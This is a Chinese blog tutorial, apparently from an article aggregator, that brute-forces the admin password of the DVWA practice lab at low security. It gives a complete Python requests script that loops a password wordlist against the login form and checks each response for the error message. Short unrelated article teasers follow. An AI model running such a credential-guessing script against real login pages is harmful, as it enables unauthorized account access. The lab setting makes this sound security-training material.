news 2026/2/18 22:25:19

python实现密码暴力破解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
python实现密码暴力破解

实战:DVWA靶场

靶场设置:low级别

判断是否登录成功:看返回的http请求里面是否有

Username and/or password incorrect.

我们这里假设知道用户名是admin不知道密码,要去破解密码

思路:

(1)从字典读取值,生成密码

pwds = open("password.txt") for pwd in pwds: print(pwd) pwds.close()

(2)http连接到需要爆破的地址

按F12查看标头,把你的PHPSEEEIONID复制到代码修改就可以

代码:

import requests # 如果第一个密码就提示成功,是 PHPSESSID 没有替换的问题 pwds = open("F:\\password.txt") for pwd in pwds: url = "http://localhost/dvwa/vulnerabilities/brute/" # PHPSESSID务必替换为登录以后的PHPSESSID resp = requests.get(url = url, params = {"username":"admin", "password":pwd.strip(), "Login":"Login"}, headers = {"Cookie":"security=low; PHPSESSID=13hjf2259tmmq16ukv2kdc59g6"}) #print(resp.text) if 'Username and/or password incorrect.' in resp.text: print('破解失败:'+pwd, end='') else: print('破解成功:'+pwd, end='') break; pwds.close()

(3)获得http响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”

(4)如果有提示就继续下一次循环

(5)如果没有就代表爆破成功

破解成功

登录:用户名:admin,密码password

登录成功

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/18 19:17:06

UnityRenderStreaming内网转发到公网

1、coturn 前文已编译好了coturn https://xue-fei.blog.csdn.net/article/details/155945401 配置文件 turnserver.conf # 监听地址和端口 listening-port3478 tls-listening-port5349 listening-ip0.0.0.0# 你的公网 IP(必须!用于 NAT 穿透&#xff0…

作者头像 李华
网站建设 2026/2/18 5:42:19

复刻DeepSeek与GPT!AI智能对话Web高保真原型设计全解析

引言到2026年,DeepSeek、ChatGPT这类产品的界面形态,仍然是许多AI智能对话类应用的参考起点。实际做下来会发现,不管是产品经理还是UI设计师都会遇到一个的难点,就是怎么既能保证沉浸式对话的体验,同时还可以承载复杂的…

作者头像 李华
网站建设 2026/2/3 0:50:39

Stable Diffusion 3.5本地部署指南

Stable Diffusion 3.5本地部署指南:FP8量化模型高效部署实战 在AI图像生成技术飞速演进的今天,一个关键瓶颈始终困扰着普通用户和开发者——如何在有限的硬件资源下,稳定运行越来越庞大的文生图模型?直到Stability AI推出 Stable…

作者头像 李华
网站建设 2026/2/15 21:04:22

基于单片机的智能衣柜除湿与防霉系统设计【附代码】

📈 算法与建模 | 专注PLC、单片机毕业设计 ✨ 擅长数据搜集与处理、建模仿真、程序设计、仿真代码、论文写作与指导,毕业论文、期刊论文经验交流。 ✅ 专业定制毕业设计 ✅ 具体问题可以私信或查看文章底部二维码 本系统设计聚焦于为衣柜提供持续的防潮除…

作者头像 李华